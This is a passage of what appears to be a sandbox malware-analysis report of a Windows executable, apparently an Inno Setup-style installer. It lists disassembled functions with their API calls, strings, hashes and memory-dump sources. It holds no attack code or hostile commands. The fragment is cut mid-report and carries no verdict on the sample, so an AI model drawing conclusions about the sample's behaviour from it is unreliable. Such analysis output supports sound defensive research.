                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1941d0d4221d31b2177a9e0bf96856282cc1e1b6b4252b38d63793718c861322
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9F0F971A04604AB8B20DBA69D0149EB7ACEB46725710467BFC14E3292EAB94E048558
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004175A8 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CaptureIconic
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2277910766-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d3578eab4591e842fd700368e217f6695640d240fe6429a4dd0cb93449941a9c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: edcb67aebd7cb7e0e4c3241a821d6ac110e093164443c601d5aebb18a23c44a8
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3578eab4591e842fd700368e217f6695640d240fe6429a4dd0cb93449941a9c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2F04F32304A028BDB21A72EC885AEB62F5DF84368B14443FE415CB765EB7CDCD58758
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004241A4 Relevance: 3.0, APIs: 2, Instructions: 22windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • IsIconic.USER32(?), ref: 004241AB
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                                                                                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2671590913-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00455588 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: NameUser
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2645101109-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cd9d261bbe345dbfbc1978f69ea3c80f8509ceaa1a51dcff4dfe5a18c54a8916
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 445fb77b721d6e8bc33303137c5d79e403f1e24c04085a252f4bbff9531eb306
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd9d261bbe345dbfbc1978f69ea3c80f8509ceaa1a51dcff4dfe5a18c54a8916
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AD0C271304704A3C700AAA99C825AA35DD8B84315F00483F3CC6DA3C3FABDDA481696
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0044B668 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 252libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B614: GetVersionExA.KERNEL32(00000094), ref: 0044B631
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6B9
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6CB
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6DD
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6EF
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B701
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B713
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B725
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B737
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B749
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B75B
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B76D
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B77F
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B791
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B7A3
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7B5
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7C7
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7D9
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7EB
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7FD
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B80F
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B821
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B833
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B845
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B857
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B869
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B87B
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B88D
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B89F
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8B1
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8C3
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8D5
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8E7
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8F9
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B90B
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B91D
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B92F
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B941
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B953
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B965
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B977
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B989
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B99B
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B9AD
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9BF
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9D1
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9E3
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoadVersion
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1968650500-2910565190
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9c853e2fff55d65e8d129e85ff78f3f369b1d987d424fcfc4da802376ce12adb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 346aa6b979044c2d6f95573bc57da9b6801dc261a15d858c7a91061cf3dc2738
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c853e2fff55d65e8d129e85ff78f3f369b1d987d424fcfc4da802376ce12adb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC91E7B0A40B50EBEF00EBF5ADC6A2637A8EB15B14714467BB444EF295D778D800CF99
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00492208 Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,00000000,004926FD,?,?,?,?,00000000,00000000,00000000), ref: 00492248
                                                                                                                                                                                                                                                                                                                                                                  • FindWindowA.USER32(00000000,00000000), ref: 00492279
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FindSleepWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3078808852-3310373309
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d7dc25f5351ce0c3cf552ae760edf39d4f9b9a96261b56e9e1545ea6af5b7163
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d4b9d66e752ac066ee841e8e0b6dcdad2790022369f15f3c2d7e05b7c0e56f01
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7dc25f5351ce0c3cf552ae760edf39d4f9b9a96261b56e9e1545ea6af5b7163
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7BC18360B042003BDB14BE3E8D4651F599AAF98704B21DA3FB446EB78BDE7DDC0A4359
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00458184 Relevance: 45.7, APIs: 11, Strings: 15, Instructions: 237filesynchronizationprocessCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00499B18,00000001,00000000,00000000,004584B9,?,?,?,00000001,?,004586D3,00000000,004586E9,?,00000000,0049B628), ref: 004581D1
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileMappingA.KERNEL32(000000FF,00499B18,00000004,00000000,00002018,00000000), ref: 00458209
                                                                                                                                                                                                                                                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045848F,?,00499B18,00000001,00000000,00000000,004584B9,?,?,?), ref: 00458230
                                                                                                                                                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045833D
                                                                                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045848F,?,00499B18,00000001,00000000,00000000,004584B9), ref: 00458295
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458354
                                                                                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045838D
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,000000FF,004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045839F
                                                                                                                                                                                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458471
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458480
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458489
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4012871263-351310198
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: eb8db78fecf0c55d76ee5f629d1abcc1bb306bcc403d3524b76b077b64b0abe0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 29107a7cf73729034b65a1fcaaf08eab05738b19563c620e852bf3134b102344
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb8db78fecf0c55d76ee5f629d1abcc1bb306bcc403d3524b76b077b64b0abe0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46914170A002099BDB10EFA9C845B9EB7B4EB05305F50856FED14FB283DF7899498F69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0045892C Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 186pipeprocessfileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00458993
                                                                                                                                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(02123858,00000000,00458C26,?,?,02123858,00000000,?,00459322,?,02123858,00000000), ref: 0045899C
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(02123858,02123858), ref: 004589A6
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,02123858,00000000,00458C26,?,?,02123858,00000000,?,00459322,?,02123858,00000000), ref: 004589AF
                                                                                                                                                                                                                                                                                                                                                                  • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00458A25
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02123858,02123858), ref: 00458A33
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,00458BE2), ref: 00458A7B
                                                                                                                                                                                                                                                                                                                                                                  • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00458BD1,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,00458BE2), ref: 00458AB4
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                                                                                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458B5D
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00458B93
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,00458BD8,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458BCB
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
